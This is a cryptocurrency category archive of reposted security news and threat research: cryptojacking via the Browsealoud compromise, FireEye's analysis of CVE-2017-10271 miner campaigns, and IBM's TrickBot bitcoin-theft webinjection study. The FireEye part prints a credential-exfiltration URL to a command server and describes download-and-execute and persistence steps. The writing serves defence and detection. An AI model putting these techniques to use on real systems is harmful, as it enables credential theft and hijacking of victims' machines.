Category Archives: cryptocurrency

Combining Machine Learning and Cognitive Analysis for Profitable Cryptocurrency Trading

Fluctuations in the cryptocurrency market is seen by some people as a sign of instability, therefore they feel that the crypto ecosystem is unpredictable and should be avoided. For most traders and speculators, this is the best mood of the market because huge swings also means increased opportunities to make profit.

A market growing in complexity

Trading cryptocurrencies can be great, but it can also go really fast from an informed investment practice to pure gambling. The huge profit making opportunities that are exposed by the price swings and volatility in the crypto market seems to attract a lot of new entrants, thereby causing a boom in a making that is also growing in complexity.

The growing complex nature of this market has given rise to more in depth measures as traders try to find ways to sustain the consistency of winning trades. Most times, in order to overcome human emotions and cognitive bias, traders have relied on the potentials of machine intelligence.

Trading by automation

Powerful computational technology is systematically replacing the traditional trading methods. These days, machine learning and computer algorithms are used to analysed and sometimes even execute trades. Bots that are developed with plugin capacities are now attached to exchanges and execute trades round the clock based on instructions that are inputted through their settings. These systems tend to function effectively as long as market cycles remain consistent, until certain human factors like the regulation attempts of early 2018 show up. At such points, these algorithms fail.

To address the existing loopholes, Signals is building a platform for building, training and monetizing crypto trading strategies with a user-friendly interface, accessible to anyone without any programming skills needed. Signals will connect crypto traders with data science developers.

Combining Machine Learning and Cognitive Analysis for Profitable Cryptocurrency Trading

Combining human and computer techniques

Signals seeks to empower crypto traders with state of the art algorithms from the data science community, which will allow them to optimize their profits. The Signals Platform provides these tools in a user-friendly way. From advanced charting and classic technical indicators to complex statistical models, crowd wisdom based inputs and machine learning algorithms based on media monitoring and sentiment analysis.

This process will connect data science developers with cryptocurrency traders researching and build a new crypto trading platform that would be easy to use for everyone.

By using sophisticated machine learning techniques developed by data science specialists in the Czech Republic and ties to decentralized supercomputers, Signals will offer a simple UI for assembling indicators and creating signals to optimize profit on various cryptocurrency exchanges.

Beyond just trading

The platform provides an environment where anyone can build strategies from specific trading indicators, ranging from technical analysis to crowd wisdom insights, train it on historical data, and monetize such strategies by offering copy trading.

Therefore, summarily the Signals platform will represent a marketplace of data science powered signals for trading cryptocurrencies. Also the platform emphasizes the concept of smart technology, with a strong technological background (AI, algotrading, sentiment analysis, machine learning, potentially powered by a supercomputer).

Other benefits offered by the platform includes the education of traders to get rid of cognitive bias and make smarter decisions while providing an environment to build and optimize smart trading strategies. This gives users an option to monetize their strategies and empower them to make critical, transparent and well influenced investment decisions while reducing the risks and creating tools of tomorrow.

The post Combining Machine Learning and Cognitive Analysis for Profitable Cryptocurrency Trading appeared first on TechWorm.

This Week in Security News: Senate Hearings and Equifax Breaches

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, leaders of six security agencies testified before the Senate Intelligence Committee, the Equifax hack grew in severity, and hackers used the power of Machine Learning to spread malware.

Read on to learn more.

 

How Hackers Are Leveraging Machine Learning

As agencies and security professionals continue to dig deeper into machine learning capabilities, hackers are looking toward AI-based processes to boost the effects of cyberattacks. 

Vulnerabilities in Apache CouchDB Open the Door to Monero Miners

Attacks abusing cryptocurrency miners have been on an upswing — in large part due to the growing popularity of digital currencies. 

Lazarus Campaign and LoopX Scam Show That Cryptocurrency Industry Still Fraught With Dangers

The past weeks have seen a slew cryptocurrency-related hacks. More specifically: a new threat actor known as the Lazarus Group, and the other involving a scam by one of the new cryptocurrency startups.

Cybersecurity is ‘greatest concern’ at Senate threats hearing

The leaders of six agencies, including the CIA, the NSA and the FBI, testified before the Senate Intelligence Committee on Tuesday as part of the committee’s annual “Worldwide Threats” hearing.

Driver’s license, credit card numbers: The Equifax hack is way worse than consumers knew

The Equifax data breach exposed more of consumers’ personal information than the company first disclosed last year, according to documents given to lawmakers. 

Russian accused of running Dark Web market nabbed in Thailand

Police in Thailand announced they have arrested a Russian national accused by U.S. authorities of running an online cybercrime marketplace.

Cryptojacking malware discovered running on critical infrastructure control systems

Radiflow reports that they discovered cryptojacking software — malware that mines cryptocurrency — running in the monitoring and control network of an unnamed European water utility.

Did any of these new cybersecurity developments surprise you? Let me know your thoughts below, or follow me on Twitter: @JonLClay.

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().


Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).


Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers


Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence


Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers


Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers


Figure 6: Terminating processes directly


Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key


Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion


Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.


Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers


Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware


Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence


Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage


Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.

Conclusion

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

POWERSHELL DOWNLOADER (METHODOLOGY)

MONERO MINER (METHODOLOGY)

MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise

MD5

Name

3421A769308D39D4E9C7E8CAECAF7FC4

cranberry.exe/logic.exe

B3A831BFA590274902C77B6C7D4C31AE

xmrig.exe/yam.exe

26404FEDE71F3F713175A3A3CEBC619B

1.ps1

D3D10FAA69A10AC754E3B7DDE9178C22

2.ps1

9C91B5CF6ECED54ABB82D1050C5893F2

info3.ps1

3AAD3FABF29F9DF65DCBD0F308FF0FA8

info6.ps1

933633F2ACFC5909C83F5C73B6FC97CC

lower.css

B47DAF937897043745DF81F32B9D7565

lib.css

3542AC729035C0F3DB186DDF2178B6A0

bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

TrickBot’s Cryptocurrency Hunger: Tricking the Bitcoin Out of Wallets

The TrickBot Trojan has been a rising global threat in the cybercrime arena ever since its emergence in late 2016. The organized cybergang that operates TrickBot has been widening its scope of activity to dozens of countries across the globe. It has been targeting financial entities, such as banks and credit providers, and focusing on business and private banking as it aims for hefty fraudulent transfer bounties.

But this is not where TrickBot’s diverse interests stop. As the value and popularity of cryptocurrency continues to rapidly rise, so does this cybergang’s interest in obtaining cryptocoins in the easiest way possible: theft. TrickBot configurations have featured popular cryptocurrency exchange URLs since about mid-2017, and we at IBM X-Force have been looking at the malware’s most recent attack schemes to steal coins from infected users.

There are several types of cryptocurrency platforms, each offering a variety of services, such as trading one coin for another, transferring coins between different wallets and buying coins with a credit card. According to our analysis, TrickBot is actively targeting one such service that enables users to purchase bitcoin and bitcoin cash by credit card.

The attacks we have looked into are facilitated by TrickBot’s webinjections, getting in the middle of the flow of a legitimate payment card transaction. In the normal payment scenario, a user looking to buy coins provides his or her public bitcoin wallet address and specifies the amount of bitcoin to purchase. When submitting this initial form, the user is redirected from the bitcoin exchange platform to a payment gateway on another domain, which is operated by a payment service provider. There, the user fills in his or her personal information, as well as credit card and billing details, and confirms the purchase of coins.

This is where TrickBot hijacks the coins. This particular attack targets both the bitcoin exchange website and that of the payment service to grab the coins and route them to an attacker-controlled wallet.

Watch the on-demand webinar: The Evolution of TrickBot Into the Next Global Banking Threat

Webinjection Basics

The inner workings of TrickBot’s cryptocoin attack rely on an existing TrickBot attack tactic: webinjections. This age-old favorite tool of many banking Trojans is a form of man-in-the-browser attack that enables malware to modify webpages presented to the user. Malware authors achieve this by placing hooks on key application programming interface (API) functions inside the browser. These hooks intercept information going from and back to the browser and alter it midway.

The code that dictates which webpages should be attacked is usually not part of the malware’s executable code. Rather, it is in a configuration stored separately in the form of rules, each one defining which URL is to be modified and how. These rules usually contain large sections of malicious JavaScript code that is responsible for visually modifying the page, sending sensitive user information to the fraudulent server, etc.

Unlike most financial malware, TrickBot does not expose the injected code in the configuration itself. Instead, a web URL of a remote command-and-control (C&C) server corresponds with every targeted URL. This modus operandi is called serverside webinjection and has been used by TrickBot since its launch in 2016. Serverside webinjections allow TrickBot to modify the injected code on its server in real time without having to update the configuration on the infected machine.

The Target: Bitcoin

To see the attack rules TrickBot has in store for any targeted site, we must first access the configuration. TrickBot keeps its configuration encrypted on the infected machine. To read it and unveil the list of targeted entities, one can either decrypt the configuration file or inspect it in the browser’s memory after the malware has already decrypted it.

The relevant part of TrickBot’s configuration for this attack shows that the scheme involves two webpages that, together, make up the coin purchase process. The first is a page where the user provides his or her bitcoin wallet address and the desired amount of bitcoin to purchase. The second is a page where the payment process is executed.

In the image below, we can see the exact set of rules in TrickBot’s configuration, each one matching a targeted page with a URL on TrickBot’s server. This way, TrickBot fetches the appropriate webinjection to alter the legitimate transaction and do its bidding instead.

IBM X-Force Research

Figure 1: Attack rules in TrickBot’s configuration (source: X-Force Research)

To enable it to control the infected machine’s web browser, TrickBot’s modules are injected into the browser ahead of time and already have hooks in place to launch webinjections.

IBM X-Force Research

Figure 2: TrickBot dynamic link libraries (DLLs) loaded into the browser

IBM X-Force Research

Figure 3: PR_Read and PR_Write functions with TrickBot’s hooks in place

To view what was happening during the web session, we sniffed HTTP network traffic on the infected machine when opening the targeted URL. This revealed the attack flow of the malware’s dynamic injection method, which TrickBot refers to as “dinj.”

For every resource that TrickBot wishes to replace — an HTML page, a JavaScript or a CSS file — an HTTP POST request is sent to the C&C server with the following attributes of that resource:

  1. “sourcelink,” the complete URL of the resource to be replaced;
  2. “sourcequery,” the browser’s HTTP request for the resource (including all headers); and
  3. “sourcehtml,” the original code as would be returned by the legitimate host.

Injection No. 1: Gathering Victim Data

One of the resources TrickBot replaced is the HTML code of the bitcoin website. The code is being switched up to gather data on the victim’s cryptocoin wallet and the number of coins to be purchased.

Using Wireshark, we can see that the page is sent to TrickBot’s C&C and that a the attack server returned a modified version.

IBM X-Force Research

Figure 4: HTTP Packets capture from the targeted site sent to C&C

IBM X-Force Research

Figure 5: The injection request for the HTML page of the targeted site

To point out the injected script, we performed a simple diff between the original page source and the one returned by TrickBot’s C&C.

IBM X-Force Research

Figure 6: Diff between original HTML page and one returned by TrickBot

Flow of Events

The script first fetches an HTML element with ID “btcAddress.” This element is an input field in which the user fills in his or her wallet address. If this element is found on the page, the malware performs the following actions to alter the interaction with the targeted webpage:

  1. Any existing logic attached to the enter key (key code 13) is eliminated, probably to limit the form submission via keyboard and make sure the victim has to click a TrickBot-generated submit button.
  2. The original submit button is cloned, the new copy is placed in the HTML document object model (DOM) and the original button is hidden from the victim.
  3. A fraudulent form-submission process is registered to the new submit button with an event listener. Upon clicking, the wallet address and the desired amount of bitcoin entered by the user are fetched and sent to the malware server using an AJAX request.

IBM X-Force Research

Figure 7: Part of the injected code TrickBot used to hijack cryptocoin purchase transactions (code comments added by X-Force research)

The injection into the HTML page is used only to collect information. The attacker can use this information — the legitimate user’s bitcoin wallet address and the bitcoin amount to purchase — to decide whether to proceed with a fraudulent operation.

Later on, after being redirected to the payment process, TrickBot will gather more information. This is probably done to allow a future account takeover attack, which will enable the fraudsters to perform a purchase/coin transfer from a machine they control using the legitimate user’s wallet credentials and payment card details.

Injection No. 2: Stealing the Coins

The second phase of the TrickBot attack facilitates the theft of the cryptocoins by preying on the web logic defined by the payment provider for legitimate online transactions.

The actual bitcoin theft is once again facilitated by a webinjection that modifies another resource of the site, “bundle.js,” which contains most of the payment processing logic.

IBM X-Force Research

Figure 8: bundle.js is loaded by the original HTML page

IBM X-Force Research

Figure 9: The dynamic injection request to bundle.js

By checking the diff between the original version of bundle.js and the modified one, we noticed that the function sendPaymentRequest had been changed. This function is responsible for sending payment requests to the payment service provider, and it has been modified to contain a hardcoded bitcoin address instead of the one inserted by the user.

IBM X-Force Research

Figure 10: sendPaymentRequest before and after modification by TrickBot

The “walletaddress” attribute is the address of the bitcoin wallet to which the purchased coins will be delivered after the deal is complete. This injection ensures that the bitcoin will not be delivered to the original address provided by the victim, but to an address belonging to TrickBot’s operators.

From this point on, the victim is led through several steps of identification in which he or she provides a phone number, an email address, a selfie photo with the credit card he or she wants to use, and a photo of his or her national ID card.

However, these steps only serve to verify the personal identity and not the ownership of the wallet address. By now, the wallet address has already been set and will not be shown to the victim again. Thus, the victim’s credit card will be charged and he or she will believe the deal was successful, expecting to see the new coins in his or her wallet. The bitcoin will never reach the designated wallet, however, but will instead be delivered to a wallet belonging to one of TrickBot’s operators.

More to Come?

Having researched the attack tactics TrickBot applied to this cryptocurrency coin theft, we can see that, while it relies on existing mechanisms, the scheme required extensive research of the targeted sites, their web logic and the security controls they use. It highlights what we already know about this malware gang: It continues to study new targets and expand its reach.

As the theft of cryptocurrency becomes increasingly popular among financial malware operators, we expect to see a many more campaigns targeting platforms and service providers in the cryptocurrency sector.

To mitigate the risk of financial malware, organizations can leverage the adaptive controls provided by IBM Trusteer’s Pinpoint Detect.

Indicators of Compromise

In this study, we used a TrickBot sample with MD5 039bc78ca0801006cc33485bc94f415c.

Watch the on-demand webinar: The Evolution of TrickBot Into the Next Global Banking Threat

The post TrickBot’s Cryptocurrency Hunger: Tricking the Bitcoin Out of Wallets appeared first on Security Intelligence.

Thousands of Websites Load Cryptocurrency Miner After Cybercriminals Compromise Third-Party Library

Thousands of websites secretly loaded a cryptocurrency miner that preys upon visitors after cybercriminals compromised a third-party library.

Security researcher Scott Helme reported the incident in a blog post that detailed how unknown actors changed one of the script files hosted by Texthelp, a provider of reading-assistive technology. Those malefactors targeted the Browsealoud web screen reader and altered it to include the CoinHive Monero miner.

“The ba.js had been altered to include a document.write call that added a CoinHive crypto miner to any page it was loaded in to,” Helme explained. In total, he found that the incident affected more than 4,000 websites, including many “prominent government websites” in the U.S. and U.K.

Swift Response

Helme reached out to Texthelp following his discovery, and the technology provider responded by temporarily disabling Browsealoud. It also issued a statement informing customers that it had implemented its “data security action plan” after learning of the issue. Texthelp went on to note that it had removed Browsealoud from all customer sites and mitigated any associated risk within four hours.

The U.K.’s Information Commissioner’s Office (ICO) took down its website Feb. 11 after learning it had been affected. The site remained offline the next day while the ICO investigated the incident.

Preventing Cryptocurrency Miner Attacks

The surge of cryptocurrency miner attacks in recent months calls for domain owners to strengthen the security of their websites. According to Helme, they can protect their sites against this particular attack type by adding the SRI Integrity Attribute, which enables the browser to determine whether a file has been modified. If someone has changed it, the browser won’t load the file.

Domain owners can take their website security one step further by implementing the Content Security Policy and the require-sri-for directive, Helme noted. Together, those measures prevent any script from loading on a hosted webpage without an SRI Integrity Attribute.

The post Thousands of Websites Load Cryptocurrency Miner After Cybercriminals Compromise Third-Party Library appeared first on Security Intelligence.

Hackers Exploit ‘Telegram Messenger’ Zero-Day Flaw to Spread Malware

A zero-day vulnerability has been discovered in the desktop version for end-to-end encrypted Telegram messaging app that was being exploited in the wild in order to spread malware that mines cryptocurrencies such as Monero and ZCash. The Telegram vulnerability was uncovered by security researcher Alexey Firsh from Kaspersky Lab last October and affects only the Windows client of Telegram

UK government websites infected by cryptocurrency miners

Hackers injected malicious code into a plug-in for the blind in order to mine for the cryptocurrency Monero.In an attempt to mine cryptocurrency, hackers have injected malicious code into a

The post UK government websites infected by cryptocurrency miners appeared first on The Cyber Security Place.

Thousands of Government Websites Hacked to Mine Cryptocurrencies

There was a time when hackers simply defaced websites to get attention, then they started hijacking them to spread banking trojan and ransomware, and now the trend has shifted towards injecting scripts into sites to mine cryptocurrencies. Thousands of government websites around the world have been found infected with a specific script that secretly forces visitors' computers to mine

Cybersecurity week Round-Up (2018, Week 6)

Cybersecurity week Round-Up (2018, Week 6) -Let’s try to summarize the most important event occurred last week in 3 minutes.

Cyber criminals continue to target cryptocurrency industry with malware and phishing attacks.

Security researchers at Netlab have spotted a new Android mining botnet, dubbed ADB.miner, that targets devices with ADB interface open.

An international operation conducted by law enforcement allowed to dismantle the crime ring behind the Luminosity RAT. US authorities also announced to took down the global cyber theft ring known as Infraud Organization.

Good news for the Popular British hacktivist Lauri Love that will not be extradited to US, UK Court Ruled. The list of victims of the hacker includes the FBI, the Federal Reserve Bank NASA and the US Missile Defence Agency..

While Cisco and FireEye confirmed that North Korean Hacking Group exploited the recently discovered Adobe Flash 0-Day flaw,  Adobe rolled out an emergency patch that fixed it.

A security researcher ported the three NSA exploits released by Shadow Brokers crew to Metasploit, including EternalRomance.

For the second time, CISCO issues a security patch to fix a critical vulnerability in CISCO Adaptive Security Appliance. The company confirmed that threat actors are already attempting to exploit itare already attempting to exploit itin the wild .

While Intel releases new Spectre security updates, currently only for Skylake chips, VMware issues temporary mitigations for Meltdown and Spectre flaws.

The source code of the Apple iOS iBoot Bootloader leaked online, while Apple downplays the data leak security experts warn hacker can use it for a future jailbreak.

Swisscom data breach Hits 800,000 Customers, roughly 10% of Swiss population.

Crooks and experts devised new methods to exfiltrate data from compromised systems. Researchers at Forcepoint discovered a new piece of malware dubbed UDPOS that exfiltrates credit card data DNS queries.

The week ended with the discovery of an unpatchable flaw in Nintendo Switch bootROM by fail0verflow hacker group that exploited it to runs Linux OS on the console.

This week a researcher at Trustwave disclosed many vulnerabilities in NETGEAR routers, and Lenovo patches critical flaws that affect Broadcoms chipsets in dozens of Lenovo ThinkPad.

https://youtu.be/wVrJF7H4n1k

 

Pierluigi Paganini

(Security Affairs – cybersecurity, cyberweek)

The post Cybersecurity week Round-Up (2018, Week 6) appeared first on Security Affairs.

Russian nuclear weapons engineers detained after using facility’s supercomputer to mine cryptocurrency

Reminiscent of the California Gold Rush, the cryptocurrency phenomenon has captured the minds of virtually everyone who understands digital currency. And those with the means to ‘mine’ it will go to great lengths to do so, as evidenced most recently by engineers at a nuclear weapons plant in Russia.

With direct access to 1 petaflop of computing horsepower and no apparent supervision, engineers at the Russian Federation Nuclear Center in Sarov – where the Soviets developed their first atom bomb in the 1940s – decided to make some easy money.

According to Russia’s Interfax News Agency, an unconfirmed number of engineers at the RFNC have been arrested for mining (or attempting to mine) cryptocurrency with “office computing resources.” Those resources were none other than the facility’s 1-petaflop supercomputer, which the institute uses to stimulate nuclear tests.

One petaflop is a unit of computing speed equal to one quadrillion floating point operations per second (FLOPS). It achieves this by leveraging thousands of individual processors in parallel.

“There has been an unsanctioned attempt to use computer facilities for private purposes including so-called mining,” said Tatyana Zalesskaya, head of RFNC public relations department.

In the cryptocurrency world, mining refers to validating transactions. To do that, the computer used to mine the currency must be connected to the public ledger, shared by everyone trading it. In other words, it needs to use the Internet.

And that’s exactly what one of the detained engineers reportedly attempted to do, which triggered alarms at the country’s Federal Security Service (FSB) and led to the engineers’ arrest.

Because the institute’s supercomputer is designed to test top-secret nuclear arms, the Kremlin obviously doesn’t want an Ethernet cable anywhere near it. One can only imagine the potential repercussions of these engineers’ actions. Punishment will likely greatly exceed a slap on the wrist.

Litecoin Is the Second-Most Popular Cryptocurrency on the Dark Web, Study Finds

Litecoin is the second-most popular cryptocurrency among vendors that operate on the Dark Web, according to recent research.

Recorded Future analyzed 150 message boards, marketplaces and illicit services on the Dark Web and determined that 30 percent of these vendors currently accept Litecoin as an alternative payment system. Not far behind is Dash, another form of cryptocurrency, which is accepted by 1 in 5 digital underground merchants.

Meanwhile, bitcoin still enjoys universal acceptance among Dark Web vendors.

Litecoin Gaining Ground on Bitcoin

According to the report, bitcoin’s rise in popularity has strained the blockchain network, resulting in larger payment fees and rendering these payments “economically infeasible.” In addition, some criminals abuse the blockchain to try to double-spend their bitcoins.

Most vendors have responded by requiring three confirmations before marking a transaction as complete. Such a policy makes Dark Web bitcoin users jittery, especially if they’re purchasing illicit goods such as drugs or weapons.

Litecoin’s code increases the speed of transactions. As a result, transaction fees are low and miners can generate a larger number of coins. Recorded Future asserted that these benefits could ultimately make Litecoin, or a similar cryptocurrency such as Dash, the top choice on the Dark Web within the next year.

Ryan Taylor, CEO of the Dash Core team, told SC Magazine he disagrees with that assessment, noting that the criminal underground doesn’t use his cryptocurrency. “Currently, less than 1 percent of transactions on the Dash network utilize the PrivateSend feature,” he said, “which contradicts the assertion that Dash is on the rise as a Dark Net payments alternative.”

The Growing Risk of Cryptocurrency Mining Attacks

If Litecoin continues to grow in popularity, ransomware authors will surely adopt the cryptocurrency. Bad actors will also begin using cryptocurrency mining attacks to generate new Litecoin, which could increase the number of organizations that will be affected by such incidents in the coming years.

The post Litecoin Is the Second-Most Popular Cryptocurrency on the Dark Web, Study Finds appeared first on Security Intelligence.

US and UK government websites hijacked to mine cryptocurrency on visitors’ machines

If undetected by a user’s security solution or content- or ad-blocker, the script ran in the background unbeknown to the user until the webpage was closed. A number of the affected websites, including that of the ICO, were also offline for hours in the aftermath of the attack.

The post US and UK government websites hijacked to mine cryptocurrency on visitors’ machines appeared first on WeLiveSecurity

WeLiveSecurity: US and UK government websites hijacked to mine cryptocurrency on visitors’ machines

If undetected by a user’s security solution or content- or ad-blocker, the script ran in the background unbeknown to the user until the webpage was closed. A number of the affected websites, including that of the ICO, were also offline for hours in the aftermath of the attack.

The post US and UK government websites hijacked to mine cryptocurrency on visitors’ machines appeared first on WeLiveSecurity



WeLiveSecurity

Hackers hijack government websites with cryptocurrency mining malware

Cryptocurrency-mining hackers attack government websites including UK and US

Scott Helme, a UK-based security researcher, discovered that more than 4,200 websites, including several government ones, were infected on Sunday with a virus that helps criminals mine cryptocurrencies.

Apparently, hackers managed to inject Coinhive cryptocurrency-mining code in the U.S. and U.K. government websites that forces web browsers to secretly mine cryptocurrency. As a result, innocent visitors who visited these compromised websites would have their computers and phones commandeered in order to mine cyrptocurrencies for the criminals.

According to reports, websites that were infected with virus include those belonging to the Information Commissioner’s Office (ICO), Student Loans Company and Scottish NHS helpline among others. The list of 4,200-plus affected websites can be found here.

In fact, ICO, the website of UK’s data protection watchdog, was taken offline after they were warned that hackers were taking control of visitors’ computers to mine cryptocurrency. The ICO said: “We are aware of the issue and are working to resolve it.”

Helme said he was informed by a friend who had received a malware warning when he visited UK government site, ico.org.uk. He found that the website was using the Coinhive in-browser mining (cryptojacking) script that caused the visitors machines to use their CPU to mine the digital currency called Monero.

On investigating further, Helme found that several other government websites from various countries such as uscourts.gov, gmc-uk.gov, nhsinform.scot, manchester.gov.uk, and many more too had started injecting a Coinhive miner.

The affected code injected in the above websites was a malicious version of a widely used text-to-speech accessibility script known as Browsealoud, which is used to help blind and partially sighted people access the web, the report says.

British tech company Texthelp, the company which makes the plug-in, confirmed that the Browsealoud script was compromised but no other Texthelp services were affected.

In a statement, Martin McKay, Texthelp’s Chief Technology Officer (CTO), in a statement said the compromise was a criminal act and an investigation is underway.

“Users who visit the hacked sites will immediately have their computers’ processing power hijacked to mine cryptocurrency – potentially netting thousands for those responsible. Government websites continue to operate securely.

“The company has examined the affected file thoroughly and can confirm that it did not redirect any data, it simply used the computers’ CPUs to attempt to generate cryptocurrency,” it said.

“The Browsealoud service has been temporarily taken offline and the security breach has already been addressed, however Browsealoud will remain offline until Tuesday 12.00 GMT.

“At this stage there is nothing to suggest that members of the public are at risk.”

Talking about the attack, Helme said, “This type of attack isn’t new – but this is the biggest I’ve seen. A single company being hacked has meant thousands of sites impacted across the UK, Ireland and the United States.

“Someone just messaged me to say their local government website in Australia is using the software as well.”

A spokesperson for the National Cyber Security Centre (NCSC) said: “NCSC technical experts are examining data involving incidents of malware being used to illegally mine cryptocurrency.

“The affected services has been taken offline, largely mitigating the issue. Government websites will continue to operate securely. At this stage there is nothing to suggest that members of the public are at risk.”

The post Hackers hijack government websites with cryptocurrency mining malware appeared first on TechWorm.

4K+ Websites Infected with Crypto-Miner after Tech Provider Hacked

Bad actors secretly infected more than 4,000 websites with the script for a crypto-miner after hacking a single technology provider. The trouble started on 11 February when Ian Thornton-Trump encountered something concerning while visiting the website for the UK Information Commissioner’s Office (ICO). Just visiting #ICO page this morning and have some concerns. Can someone […]… Read More

The post 4K+ Websites Infected with Crypto-Miner after Tech Provider Hacked appeared first on The State of Security.

Stability Means Usability for Cryptocurrencies

When Satoshi Nakamoto launched Bitcoin in 2009, he was creating a digital currency that he intended to facilitate peer-to-peer (p2p) transactions. In Bitcoin, he was building a borderless, independent currency that would not be subject to the rules and regulations of governments and central banks. Upset by the 2009 financial crisis and looking for a better way to navigate money in the digital age, Bitcoin launched, and, in many ways, it became an incredible success.

At least, that’s how many early investors felt as the digital currency swelled in value in 2017. However, for all of its acclaim, Bitcoin has functioned as a digital investment vehicle, more akin to digital gold, than a functional currency.

After all, nobody wants to face the same fate as Laszlo Hanyecz who purchased two pizzas for 10,000 Bitcoin in 2010. After Bitcoin’s meteoric rise in 2017, Hanyecz spent the equivalent of $10 million on those two pizzas. In other words, nobody wants to make purchases with a currency that fluctuates as frequently and drastically as Bitcoin and other cryptocurrencies often do.

An Unstable Investment Market

Cryptocurrencies are radical and irrational. They can be nauseating to the uninitiated, and they make it challenging to use cryptocurrencies practically. For example, just before Christmas, crypto markets inexplicably dropped by nearly 30% in only a few hours. Of course, investors had proverbial whiplash when, just a few hours later, crypto markets mostly recovered their value within the day and tacked on an additional 25% in only a few weeks.

This event isn’t an aberration. In 2017, Bitcoin dropped 70% or more on five separate occasions.

These dynamic price fluctuations are common in crypto markets. In fact, they are one of its most defining features. Cryptocurrencies are popular, practical, but incredibly unstable.

A Stable Solution

As a result, some cryptocurrencies have adopted measures to create more stable cryptocurrencies that would be more functional on account of their improved stability. These currencies, dubbed stable coins, unite their value to a tangible asset or investment so that their price is susceptible to the wild fluctuations of cryptocurrency markets.

Tether is a much hyped and hugely controversial expression of a stable coin.

To achieve greater stability and liquidity, tether “tethers” its value to the amount of money invested in the currency. According to their Proof of Funds report, “Each Tether token is backed 100% by fiat currency in Tether Limited’s reserve bank account.” Since actual dollars are required to make Tether’s price fluctuate, it was theorized that Tether’s value would remain more stable.

